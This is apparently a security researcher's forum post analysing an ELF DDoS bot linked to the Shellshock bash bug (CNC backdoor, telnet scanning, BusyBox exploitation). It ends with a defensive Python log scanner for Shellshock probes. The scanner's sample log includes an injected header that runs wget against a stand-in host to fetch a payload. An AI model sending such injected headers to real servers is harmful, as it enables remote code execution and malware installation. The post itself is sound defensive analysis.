Linux/Bash0day alias Shellshock alias Bashdoor
This sample was found via @Yinettesys's (credit) IDS sigs: https://gist.github.com/anonymous/929d622f3b36b00c0be1
The sample is up and alive; I posted my analysis in VT (see the comment tab): https://www.virustotal.com/en/file/73b0 ... 411634118/
It was announced 6h ago here: https://twitter.com/yinettesys/status/5 ... 6268604416
And detection ratio is still ZERO..
Anyway, the malware is new, spotted and saved/designed (firstly found) for a #0day, so I named it as Linux/Bash0day < (if you have a better name.. pls feel free to change..)
/* THIS is what I am afraid of for the ELF malware...sigh.. now you know why I yell ELF a lot!! The AV scanning performance for new ELF itself is ANOTHER 0day actually.. */
Basically the malware backdoors to a CNC and is remotely controlled (bot), with the busybox rooter attack. CNC info is in the analysis.
It scans for logins + tries to exploit via SCANNER (telnet?) on IPs & gained shell with an "overdue" busybox skids exec_code.. (often sighted in telnet flaw ref is here: https://isc.sans.edu/diary/Busybox+Hone ... nner/18055 ) and gain privilege of the admin/root (if possible).
The main course is: it does DDoS in TCP and UDP, as well as other attacks (JUNK, HOLD), with a backdoor to its CNC.
So it is the "another" DDoS botnet story..
The binary wasn't clearly stripped, yet using silly decrypter, it looks like a "quicky" coding job in some parts, yet well-designed/crypted in many others. I think they prepared it a bit (for this kind of occasion) BEFORE the 0day was publicly announced (still < 24day), since the 0day was found about a week before and mostly is leaked to bad guys faster than good guys.
Answering twitter comments:
A: That SCANNER part is aiming IPs + sent "that" BusyBox codes to exploit (should be telnet.. other protocol just doesn't work).. Maybe not a worm, but morons who wanna build #botnet #DDoS'er upon #0day #bash
Q: So, not a worm at least, though that's no consolation for public-facing systems
A: Aiming router for DDoS=2nd→Busybox sploit. WebServers=1st stage←no shellshock trace in #ELF (read: The actor is aiming web server to implement ELF to do the scanning of routers, PoC'ed by the busybox exploit in telnet which only affected routers/embedded linux/or MAYBE ANDROID too! for hack or DDoS or etc purpose which is the actor's end stage, in my opinion. This is backed up by the fact that there is no trace of #bash #0day CGI exploit in the binary ELF itself.. I was eager to see that actually.)
Q: IMO, likely attackers will plant malware in web servers as 2nd stage
I think we will see many more of these come up.. beware..
Feel free to add, comment, improve, criticize, put more samples of the similars. I gotta rest, in hospital bed now, bye!
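
For the first stage discussed above (web servers hit through the bash 0day, with the ELF carrying no trace of it), an added example that is not part of the original post: a Python check over web access logs for header values that begin with a bash function definition, which also pulls out any URLs in the injected command so the dropped sample can be located. It assumes Apache/nginx "combined" log format; the log lines, IPs and hostnames are constructed.

```python
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Vulnerable bash imported an environment value as a function only when the
# value started with the four characters "() {", so anchor at the start.
FUNC_DEF_RE = re.compile(r'^\(\) \{')
# URLs inside the injected command point at the payload the host was told to fetch.
URL_RE = re.compile(r'(?:https?|ftp)://[^\s"\'\\;|&]+')

def find_shellshock_probes(lines):
    """Return one record per logged header that starts with a function definition."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skipped rather than guessed at
        # Only headers that the combined format records can be checked here.
        for field in ("referer", "agent"):
            value = m.group(field)
            if FUNC_DEF_RE.search(value):
                hits.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "field": field,
                    "status": int(m.group("status")),
                    "urls": URL_RE.findall(value),
                })
    return hits

# Constructed sample input (documentation IP ranges, .invalid hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.0" 200 0 "-" "() { :;}; /usr/bin/wget -O /tmp/x http://dl.example.invalid/x"',
    '198.51.100.8 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { :; }; echo probe" "curl/7.30"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a CGI path and a non-empty `urls` list is the one to triage first: check the host for the fetched file and for outbound telnet scanning.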